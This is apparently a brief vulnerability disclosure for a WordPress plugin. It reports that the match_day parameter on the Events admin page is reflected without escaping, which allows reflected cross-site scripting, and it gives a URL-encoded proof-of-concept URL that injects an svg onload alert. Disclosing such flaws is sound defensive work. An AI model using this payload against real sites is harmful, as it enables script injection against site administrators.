The plugin does not sanitise and escape its match_day parameter before outputting back in the Events backend page, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/edit.php?post_type=sp_event&match_day=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22